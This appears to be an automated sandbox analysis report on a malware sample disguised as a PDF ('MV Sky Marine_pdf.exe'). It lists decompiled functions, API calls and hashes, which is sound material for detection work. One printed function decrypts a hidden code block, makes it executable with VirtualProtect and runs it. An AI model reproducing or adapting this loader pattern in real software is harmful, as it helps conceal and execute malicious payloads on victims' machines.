                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 86%
                                                                                                  			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E004058AB(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405842(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040554F(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040556C(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004054D2(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405D24(0x7a8800, _t28);
					if(SetCurrentDirectoryA(_t28) == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}












                                                                                                  0x004015b3
                                                                                                  0x004015ba
                                                                                                  0x004015bd
                                                                                                  0x004015c2
                                                                                                  0x004015c6
                                                                                                  0x004015c8
                                                                                                  0x004015d0
                                                                                                  0x004015d2
                                                                                                  0x004015d4
                                                                                                  0x004015d8
                                                                                                  0x004015db
                                                                                                  0x004015f3
                                                                                                  0x004015f4
                                                                                                  0x004015dd
                                                                                                  0x004015dd
                                                                                                  0x004015e0
                                                                                                  0x00000000
                                                                                                  0x004015eb
                                                                                                  0x004015ec
                                                                                                  0x004015ec
                                                                                                  0x004015e0
                                                                                                  0x004015fb
                                                                                                  0x00401602
                                                                                                  0x0040160f
                                                                                                  0x0040160f
                                                                                                  0x00401604
                                                                                                  0x00401605
                                                                                                  0x0040160d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040160d
                                                                                                  0x00401602
                                                                                                  0x00401612
                                                                                                  0x00401615
                                                                                                  0x00401617
                                                                                                  0x00401618
                                                                                                  0x004015c8
                                                                                                  0x0040161f
                                                                                                  0x0040164a
                                                                                                  0x00402197
                                                                                                  0x00401621
                                                                                                  0x00401623
                                                                                                  0x0040162e
                                                                                                  0x0040163c
                                                                                                  0x00401642
                                                                                                  0x00401642
                                                                                                  0x0040163c
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                    • Part of subcall function 004054D2: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405515
                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,007A8800,00000000,00000000,000000F0), ref: 00401634
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1892508949-0
                                                                                                  • Opcode ID: c3b6f0323b06f0309f06a6fe3ec4e1a9af763d5a6b41c691f20122222a139ed4
                                                                                                  • Instruction ID: f8e787240feab454be01a7155d6319da6ebd6cd518598c0cbf075f0ef46f4e4b
                                                                                                  • Opcode Fuzzy Hash: c3b6f0323b06f0309f06a6fe3ec4e1a9af763d5a6b41c691f20122222a139ed4
                                                                                                  • Instruction Fuzzy Hash: 26112B36908141ABEF217B755D409BF26B0ED92324728463FF492B22D2C63C0942AA2F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 69%
                                                                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a27d0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a1f8c =  *0x7a1f8c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7a1f8c, 0x7530,  *0x7a1f74), 0);
					}
				}
				return 0;
			}











                                                                                                  0x0040138a
                                                                                                  0x004013fa
                                                                                                  0x0040139b
                                                                                                  0x004013a0
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004013a2
                                                                                                  0x004013a3
                                                                                                  0x004013ad
                                                                                                  0x00000000
                                                                                                  0x00401404
                                                                                                  0x004013b0
                                                                                                  0x004013b7
                                                                                                  0x004013bd
                                                                                                  0x004013be
                                                                                                  0x004013c0
                                                                                                  0x004013c2
                                                                                                  0x004013b9
                                                                                                  0x004013b9
                                                                                                  0x004013ba
                                                                                                  0x004013ba
                                                                                                  0x004013c9
                                                                                                  0x004013cb
                                                                                                  0x004013f4
                                                                                                  0x004013f4
                                                                                                  0x004013c9
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: b365b3dadd465e375f0dd7f41f7d7e4c9c1b290602c44ff93dc5300d219615eb
                                                                                                  • Instruction ID: aea7a8e15c1c7ecce7b0681477f9c6c884b729fab1b64fa4ae005ba0d60f5490
                                                                                                  • Opcode Fuzzy Hash: b365b3dadd465e375f0dd7f41f7d7e4c9c1b290602c44ff93dc5300d219615eb
                                                                                                  • Instruction Fuzzy Hash: 220128326242109FE7095B389C04B6A3698E751359F10823BF951F76F1D77CDC429B4D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004060B4, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004060B4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409228);
				_t5 = GetModuleHandleA( *(_t10 + 0x409228));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40922c));
				}
				_t5 = E00406046(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                  0x004060bc
                                                                                                  0x004060bf
                                                                                                  0x004060c6
                                                                                                  0x004060ce
                                                                                                  0x004060da
                                                                                                  0x00000000
                                                                                                  0x004060e1
                                                                                                  0x004060d1
                                                                                                  0x004060d8
                                                                                                  0x00000000
                                                                                                  0x004060e9
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                    • Part of subcall function 00406046: GetSystemDirectoryA.KERNEL32 ref: 0040605D
                                                                                                    • Part of subcall function 00406046: wsprintfA.USER32 ref: 00406096
                                                                                                    • Part of subcall function 00406046: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: 62fccafea54e634e599a9161e1c1cefa8bb4f2fd215621dc62c81c5ca262e862
                                                                                                  • Instruction ID: 94e271bb8baa91334b258b88ca0494c783256dd753a1163dce19aac64b8b6d1e
                                                                                                  • Opcode Fuzzy Hash: 62fccafea54e634e599a9161e1c1cefa8bb4f2fd215621dc62c81c5ca262e862
                                                                                                  • Instruction Fuzzy Hash: 54E08632A4412077D620D6709E0496B72AC9A996503024D7EF916F6181D738DC219669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004059FB, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 68%
                                                                                                  			E004059FB(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                  0x004059ff
                                                                                                  0x00405a0c
                                                                                                  0x00405a21
                                                                                                  0x00405a27

                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CE8,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 004059FF
                                                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A21
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: c04a671e1d0aeebb75a90218c505478b62e23a7d0cf6ebbd9f64de51765d29e7
                                                                                                  • Instruction ID: 9ebb41c6164f6193b48f12100262a9f13d4f8789d70c6181de7ffe401b8a7c85
                                                                                                  • Opcode Fuzzy Hash: c04a671e1d0aeebb75a90218c505478b62e23a7d0cf6ebbd9f64de51765d29e7
                                                                                                  • Instruction Fuzzy Hash: BBD09E31658301AFEF098F20DD1AF2E7BA2EB84B00F10962CB686D40E0D6755859DB16
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040554F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040554F(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                  0x00405555
                                                                                                  0x0040555d
                                                                                                  0x00000000
                                                                                                  0x00405563
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403262,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405555
                                                                                                  • GetLastError.KERNEL32 ref: 00405563
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                  • Instruction ID: 338e024f856ffae945e6e79b97c519ffde5d29ce176c3d168341a8d267c22b02
                                                                                                  • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                  • Instruction Fuzzy Hash: 24C04C70A58642EBDA119B30DE087177961AB507C1F19C9356106E21A4D6349411D93E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10001070, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 65%
                                                                                                  			E10001070(void* __ecx) {
				long _v8;
				signed char _t4;
				void* _t8;

				_t4 = 0;
				do {
					_t1 =  &E10003118 + _t4; // 0x12cde9
					asm("ror dl, 0x3");
					asm("ror dl, 1");
					asm("rol cl, 0x3");
					 *( &E10003118 + _t4) = 0x00000078 - _t4 - ( !( *_t1) ^ _t4) + _t4 - 0x00000043 - 0x00000038 ^ 0x0000007a;
					_t4 = _t4 + 1;
				} while (_t4 < 0x1a05);
				VirtualProtect( &E10003118, 0x1a05, 0x40,  &_v8); // executed
				_t8 = E10003118(); // executed
				return _t8;
			}






                                                                                                  0x10001074
                                                                                                  0x10001076
                                                                                                  0x10001076
                                                                                                  0x10001086
                                                                                                  0x1000108c
                                                                                                  0x10001090
                                                                                                  0x10001099
                                                                                                  0x1000109f
                                                                                                  0x100010a0
                                                                                                  0x100010b7
                                                                                                  0x100010c2
                                                                                                  0x100010c7

                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(10003118,00001A05,00000040,?), ref: 100010B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 5fa21ae5415c18b6e1d3592b8c30bc0dfaf392d05b3d176607fa8d90b92c5692
                                                                                                  • Instruction ID: ad33dd3b534e18481b9178e707d484ef5f85e9c7f0ecf63faea97bf4d32801a6
                                                                                                  • Opcode Fuzzy Hash: 5fa21ae5415c18b6e1d3592b8c30bc0dfaf392d05b3d176607fa8d90b92c5692
                                                                                                  • Instruction Fuzzy Hash: 79F0E5245042542FFF4785748CA6BD72B8EC34A3C4F50E0A0E744C32A3D80A124C4692
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004031F5, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004031F5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                  0x004031f9
                                                                                                  0x0040320c
                                                                                                  0x00403214
                                                                                                  0x00000000
                                                                                                  0x0040321b
                                                                                                  0x00000000
                                                                                                  0x0040321d

                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00791940,00789940,004030FA,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000), ref: 0040320C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                  • Instruction ID: 344e7d9ad7bcffc728ac4804aceab3062a7c255e83d517d9652c3ef582d27c82
                                                                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                  • Instruction Fuzzy Hash: C0E08631500118BBCF209E51AD00EA73B9CDB05362F00C477F904E5190D131DA109BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00403227, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403227(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                  0x00403235
                                                                                                  0x0040323b

                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402ED3,?), ref: 00403235
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405842, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405842(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                  0x00405842
                                                                                                  0x00405855
                                                                                                  0x00405855
                                                                                                  0x00405859
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040584c
                                                                                                  0x0040584f
                                                                                                  0x00000000
                                                                                                  0x0040584f
                                                                                                  0x00000000
                                                                                                  0x0040584c
                                                                                                  0x0040585b

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,0040335A,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00409130), ref: 0040584F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213498283-0
                                                                                                  • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                  • Instruction ID: 93e74edf5e48ccf4ef67a299a55bff5a8c431ca02aebca34623625e4f9fe26b3
                                                                                                  • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                  • Instruction Fuzzy Hash: 27C0803240C64057C610771040344677FF0EB61351F14C86EFCC173160C13468648F26
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 0040514E, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 96%
                                                                                                  			E0040514E(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x7a1f84; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050E2, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
